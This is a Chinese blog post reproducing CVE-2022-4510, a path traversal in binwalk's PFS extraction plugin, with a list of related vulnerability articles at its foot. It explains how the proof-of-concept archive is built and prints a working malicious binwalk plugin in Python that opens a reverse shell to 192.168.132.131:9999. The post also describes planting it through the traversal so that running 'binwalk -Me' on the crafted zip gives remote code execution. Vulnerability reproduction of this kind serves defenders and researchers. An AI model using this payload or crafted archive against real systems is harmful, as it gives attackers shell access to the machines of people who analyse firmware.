binwalk路径穿越CVE-2022-4510

admin

100792
文章

86
评论

2023年2月7日12:29:39评论70 views字数 1059阅读3分31秒阅读模式

前两天在玄武实验室的日推里看到的，复现一下

简介

在 binwalk 中有一个提取 PFS 文件的插件，一般在嵌入式设备中涉及这种文件格式，但是它在提取文件的时候，路径取的有问题，会导致路径穿越，把文件写到任意的地方

效果

配合 binwalk 可以在 ~/.config/binwalk/plugins 目录自定义插件运行的特性，通过路径穿越把 python 脚本写在这里，基本能执行任意的命令（毕竟 python 可以 os.system）

局限

因为不知道目标的目录结构，可能没法准确的放到那个目录，可以考虑其他利用方式，参考文章有提到

影响范围

2.1.2b 到 2.3.3

复现过程

在官方仓库的 release 界面找到一个在漏洞范围内的下载下来，比如 2.3.3，然后解压出来放在一台 ubuntu 上，进入目录，python setup.py install 安装一下，poc 这里有：

https://github.com/ReFirmLabs/binwalk/pull/617

在 ~ 目录下使用 binwalk -Me poc.zip 看一下是不是有效果

接下来看一下 POC 是怎么构成的，压缩包里面有个 pfs 文件

直接解压出来看看，前面是文件头加路径，后面是文件内容，经过尝试文件内容前面的 C1 就是文件内容长度

接下来保持前面不变，我们自己写个 python 脚本放在 PFS 文件中，并且把长度改一下，然后保存成一个压缩包

import binwalk.core.pluginimport socket,subprocess,os,ptyclass MaliciousExtractor(binwalk.core.plugin.Plugin):    def init(self):        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)        s.connect(("192.168.132.131",9999))        os.dup2(s.fileno(),0)        os.dup2(s.fileno(),1)        os.dup2(s.fileno(),2)        pty.spawn("sh")

binwalk路径穿越CVE-2022-4510

binwalk -Me malicious.zip 然后 RCE！

参考：

https://github.com/ReFirmLabs/binwalk/pull/617https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/

原文始发于微信公众号（陈冠男的游戏人生）：binwalk路径穿越CVE-2022-4510

左青龙
微信扫一扫

右白虎
微信扫一扫

binwalk路径穿越CVE-2022-4510

魔方网表mailupdate.jsp接口存在任意文件上传漏洞

漏洞预警丨Palo Alto Networks PAN-OS 命令注入漏洞(CVE-2024-3400)

SnakeYaml 中不安全的反序列化漏洞 (CVE-2022-1471) 有感

【风险通告】Palo Alto Networks PAN-OS存在命令注入漏洞（CVE-2024-3400）

【漏洞通告】MySQL2远程代码执行漏洞（CVE-2024-21508）

(0day)WIFISKY7层流控路由器某接口存在RCE漏洞

用友 NC grouptemplet 文件上传漏洞

网康科技NS-ASG应用安全网关存在SQL注入漏洞

【漏洞复现】广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞

Apache Zeppelin存在代码注入漏洞(CVE-2024-31861)

发表评论

在线咨询

微信